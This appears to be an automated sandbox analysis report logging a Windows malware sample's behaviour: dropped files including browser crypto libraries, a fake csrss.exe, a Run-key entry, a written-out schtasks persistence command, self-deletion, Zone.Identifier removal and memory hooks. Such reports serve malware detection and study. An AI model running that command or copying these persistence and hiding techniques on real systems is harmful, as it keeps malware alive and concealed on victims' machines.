Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-5E5MG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libbz2-1.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ccjteug			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\usjteug			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\mcyq2aqnu0.exe

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\ccjteug:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\usjteug:Zone.Identifier read attributes \| delete			Jump to behavior

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3360005 value: E9 8B 2F 02 74
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382F90 value: E9 7A D0 FD 8B
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3470005 value: E9 2B BA ED 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 7734BA30 value: E9 DA 45 12 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3480008 value: E9 8B 8E F1 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77398E90 value: E9 80 71 0E 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3490005 value: E9 8B 4D 4A 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 76934D90 value: E9 7A B2 B5 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 34A0005 value: E9 EB EB 4A 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 7694EBF0 value: E9 1A 14 B5 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 34C0005 value: E9 8B 8A 46 72
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 75928A90 value: E9 7A 75 B9 8D
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 34D0005 value: E9 2B 02 48 72
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 75950230 value: E9 DA FD B7 8D
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 34E0005 value: E9 5B 2E EA 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382E60 value: E9 AA D1 15 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 34F0005 value: E9 EB 3E E9 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77383EF0 value: E9 1A C1 16 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3500005 value: E9 DB 2F E8 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382FE0 value: E9 2A D0 17 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3510005 value: E9 BB 2D E7 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382DC0 value: E9 4A D2 18 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3520005 value: E9 CB 2A E6 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382AD0 value: E9 3A D5 19 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3530005 value: E9 7B 2B E5 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382B80 value: E9 8A D4 1A 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3540005 value: E9 1B 2F E4 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382F20 value: E9 EA D0 1B 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3550005 value: E9 FB 2C E3 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382D00 value: E9 0A D3 1C 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3560005 value: E9 DB 2D E2 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382DE0 value: E9 2A D2 1D 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3570005 value: E9 AB 3E E1 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77383EB0 value: E9 5A C1 1E 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3580005 value: E9 2B 2F E0 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382F30 value: E9 DA D0 1F 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3590005 value: E9 9B 2F DF 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382FA0 value: E9 6A D0 20 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 35A0005 value: E9 0B 2D DE 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382D10 value: E9 FA D2 21 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 35B0005 value: E9 CB 3B DD 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77383BD0 value: E9 3A C4 22 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 35C0005 value: E9 2B 2D DC 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382D30 value: E9 DA D2 23 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 35D0005 value: E9 4B 47 DB 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77384750 value: E9 BA B8 24 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 35E0005 value: E9 BB 2C DA 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382CC0 value: E9 4A D3 25 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 35F0005 value: E9 5B 2B D9 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382B60 value: E9 AA D4 26 8C
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 3600005 value: E9 6B 2B D8 73
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Memory written: PID: 6260 base: 77382B70 value: E9 9A D4 27 8C

Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
